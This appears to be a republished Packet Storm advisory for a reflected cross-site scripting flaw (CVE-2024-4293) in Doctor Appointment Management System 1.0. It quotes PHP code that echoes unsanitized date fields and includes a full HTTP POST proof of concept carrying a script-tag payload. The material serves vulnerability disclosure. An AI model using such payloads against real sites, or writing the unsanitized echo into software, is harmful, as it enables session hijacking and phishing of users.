Security
Headlines
HeadlinesLatestCVEs

Headline

Doctor Appointment Management System 1.0 Cross Site Scripting

Doctor Appointment Management System version 1.0 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#vulnerability#web#windows#google#git#java#php#auth#firefox

Application Name: Doctor Appointment Management System

Software Link: Download Link

Vendor Homepage: Vendor Homepage

BuG: XsS

BUG_Author: SoSPiro

Version: 1.0

CVE: CVE-2024-4293

Vulnerable code section:

  • http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php

  • Lines 57-61

  • Parameter $fdate=$_POST['fromdate']; and $tdate=$_POST['todate']

<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];  
?>  
<h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5>

  • The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

Vulnerability Description:

  • The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.

Proof of Concept (PoC)


POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 60  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php  
Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-PwnFox-Color: blue

fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=

  • In this POST request, an attacker has included a script tag in the “fromdate” and “todate” field:

<script>alert(1)</script>

  • Upon successful exploitation, an alert box containing the text “1” will be displayed on the victim’s browser, indicating that the XSS vulnerability has been successfully exploited.

Impact:

  • The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.

Reproduce:

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution